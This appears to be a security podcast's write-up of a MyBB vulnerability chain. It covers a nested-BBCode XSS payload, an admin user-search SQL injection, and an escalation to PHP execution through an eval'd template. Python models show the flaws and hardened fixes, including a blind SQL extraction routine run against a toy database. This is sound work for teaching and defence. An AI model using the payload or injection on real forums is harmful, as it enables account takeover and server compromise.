[MyBB] BBCode XSS to Admin SQL Injection to Code Injection Chain

We discussed this vulnerability during Episode 183 on 30 January 2023

A BBCode XSS, chained with a SQL injection in the admin panel's user search, that can potentially be escalated to PHP code execution.

XSS

The XSS uses a trick we've talked about before (episode 109): unexpected nesting, putting a tag in a position where the parser still processes it but the renderer does not expect to find its output.

[email][email= onpointerover=alert()//]text[/email]

In this case an [email] tag is nested within the email attribute of another [email] tag. When rendered, the normal HTML rendering of the inner [email] tag is reflected inside the href attribute of the outer one. Since that rendering includes a double quote (") it breaks out of the href attribute, and the rest of the payload lands in the tag as a new onpointerover attribute containing JavaScript; the trailing // comments out the leftover attribute text when the handler runs.

I'm not sure whether the missing [/email] in the above payload is essential or just a side-effect of it being fuzzer generated.
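To make the nesting concrete, here is a small constructed model of the bug class, added for this write-up and not MyBB's parser: a BBCode renderer that resolves the innermost [email] tag first and, when the outer tag has no explicit address, reuses the already-rendered body as the href value without attribute escaping. The regexes, the function names (render_vulnerable, render_hardened, event_handler_attrs), the PAYLOAD constant and the requirement that both tags be closed are assumptions of the model. The event_handler_attrs check runs the output through Python's stdlib HTML parser to report which on* attributes a browser's tokenizer would actually see.

```python
import html
import re
from html.parser import HTMLParser

# Constructed model of the bug class, not MyBB's parser. The tag regex,
# the innermost-first rendering order and the function names are assumptions.

# Matches the innermost [email]...[/email] or [email=addr]...[/email]:
# the body may not contain another [email or [/email, so nested tags are
# always resolved from the inside out.
EMAIL_TAG = re.compile(
    r"\[email(?:=(?P<addr>[^\]]*))?\]"
    r"(?P<body>(?:[^\[]|\[(?!/?email))*)"
    r"\[/email\]",
    re.IGNORECASE,
)

# Strict shape an address must have before it is allowed into href.
ADDRESS = re.compile(r"[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def _render(text: str, make_link) -> str:
    """Replace the innermost [email] tags until no tag is left."""
    while True:
        new = EMAIL_TAG.sub(lambda m: make_link(m.group("addr"), m.group("body")), text)
        if new == text:
            return new
        text = new


def render_vulnerable(text: str) -> str:
    """Modelled flaw: with no =addr part the (already rendered) body doubles
    as the address and is dropped into href without attribute escaping."""
    def make_link(addr, body):
        addr = body if addr is None else addr
        return f'<a href="mailto:{addr}">{body}</a>'
    return _render(text, make_link)


def render_hardened(text: str) -> str:
    """Fix: refuse anything not shaped like an address, and escape the value
    for the attribute context *after* all nested rendering has happened."""
    def make_link(addr, body):
        addr = body if addr is None else addr
        if not ADDRESS.fullmatch(addr):
            # body is our own rendered HTML or raw text; the model assumes raw
            # input was HTML-escaped before BBCode parsing, as such parsers do.
            return body
        return f'<a href="mailto:{html.escape(addr, quote=True)}">{body}</a>'
    return _render(text, make_link)


class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name.lower() for name, _ in attrs)


def event_handler_attrs(rendered: str) -> list:
    """on* attribute names a browser's tokenizer would see in the output."""
    p = _AttrCollector()
    p.feed(rendered)
    p.close()
    return sorted(n for n in p.names if n.startswith("on"))


# The page's payload with the outer tag closed as well (this model needs both).
PAYLOAD = "[email][email= onpointerover=alert()//]text[/email][/email]"

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(event_handler_attrs(render_vulnerable(PAYLOAD)))
    print(render_hardened(PAYLOAD))
```

Note that the payload itself contains no <, > or quote characters: the double quote that closes href is produced by the renderer's own output, which is why HTML-escaping the raw input before BBCode parsing does not help here. The fix has to escape for the attribute context after nested rendering, and refusing anything that does not look like an address removes the nesting trick entirely.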

SQL Injection

The user search in the admin panel can search custom profile fields. To do this, a set of key/value pairs is sent as an array named profile_fields: each key is a column name and each value is the value to be matched. Unfortunately for MyBB, the column names are only passed through escape_string before being used as identifiers in the final query.

$userfield_sql .= ' AND '.$db->escape_string($column)." != ''";

It uses the escape_string method, but the column name is not placed inside a quoted string in the SQL statement. escape_string only neutralizes quote, backslash and a few control characters, none of which an attacker needs when writing directly into an identifier position, so one can easily inject other SQL keywords and change the semantics of the query.
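The following is a constructed example for this write-up, not MyBB's code; the schema, the sample rows (the password is a dummy 12-character string), the column naming fid1, fid2, ... and the function names are all assumptions. It models the vulnerable query construction from the fragment above beside an allowlisting fix, and shows why escape_string is the wrong tool: a MySQL-style escape_string leaves a quote-free identifier payload untouched. The injected "column" carries a boolean condition against another table, which the attacker drives with a binary search to recover, here, the length of a value from that table.

```python
import re
import sqlite3

# Constructed model of the vulnerable query construction, not MyBB's code.
# Schema, sample rows and column naming (fid1, fid2, ...) are assumptions.

BASE_QUERY = "SELECT ufid FROM userfields WHERE 1=1"


def escape_string(value: str) -> str:
    """MySQL-style escape_string: backslash-escapes the characters that matter
    INSIDE a quoted string literal. A payload in identifier position that
    contains none of them passes through unchanged."""
    return re.sub(r"(['\"\\\x00\n\r])", r"\\\1", value)


def build_search_vulnerable(profile_fields: dict) -> str:
    """Same shape as the MyBB fragment: the *column name* goes through
    escape_string() and is spliced in unquoted, as an identifier."""
    userfield_sql = ""
    for column, value in profile_fields.items():
        if value == "":
            continue  # only fields the admin filled in take part
        userfield_sql += " AND " + escape_string(column) + " != ''"
    return BASE_QUERY + userfield_sql + " ORDER BY ufid"


COLUMN_RE = re.compile(r"fid\d+")  # assumed naming of custom field columns


def build_search_hardened(profile_fields: dict) -> str:
    """Identifiers cannot be escaped like data; they must be allowlisted."""
    parts = []
    for column, value in profile_fields.items():
        if value == "":
            continue
        if not COLUMN_RE.fullmatch(column):
            raise ValueError(f"unknown profile field column: {column!r}")
        parts.append(f' AND "{column}" != \'\'')
    return BASE_QUERY + "".join(parts) + " ORDER BY ufid"


def injected_column(threshold: int) -> str:
    """Attacker-chosen 'column name'. No quote characters anywhere, so
    escape_string() returns it unchanged; it makes the WHERE clause depend
    on a value from an unrelated table."""
    return (
        "1 AND (SELECT length(password) FROM users WHERE uid=1) "
        f"> {threshold} AND fid1"
    )


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the password is a dummy 12-character string."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (uid INTEGER, username TEXT, password TEXT);
        CREATE TABLE userfields (ufid INTEGER, fid1 TEXT);
        INSERT INTO users VALUES (1, 'admin', 'a1b2c3d4e5f6');
        INSERT INTO userfields VALUES (1, 'Berlin'), (2, ''), (3, 'Oslo');
        """
    )
    return db


def search(db: sqlite3.Connection, profile_fields: dict) -> list:
    """The admin-panel search as the vulnerable code would run it."""
    return [row[0] for row in db.execute(build_search_vulnerable(profile_fields))]


def recover_password_length(db: sqlite3.Connection, max_len: int = 64) -> int:
    """Boolean-blind extraction through the vulnerable search: rows come back
    only when length(password) > threshold, so a binary search over the
    threshold pins the exact length."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if search(db, {injected_column(mid): "x"}):
            lo = mid + 1  # length > mid
        else:
            hi = mid      # length <= mid
    return lo


if __name__ == "__main__":
    db = make_db()
    print(build_search_vulnerable({injected_column(10): "x"}))
    print("legit search:", search(db, {"fid1": "x"}))
    print("recovered password length:", recover_password_length(db))
```

The hardened builder still quotes the identifier after the allowlist check, but the allowlist is what does the work: there is no escaping function that makes an arbitrary string safe in identifier position, so the set of permitted column names has to be known up front.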

Code Execution

If the database driver in use accepts stacked queries (several statements in one call; PHP's mysqli_query() does not, while PostgreSQL's pg_query() does), then this SQL injection can be turned into PHP code execution. MyBB passes its templates through eval when rendering them, including the member_profile_signature template. By using the injection to UPDATE that template, one could inject into the eval call and have arbitrary PHP executed the next time a profile signature is rendered.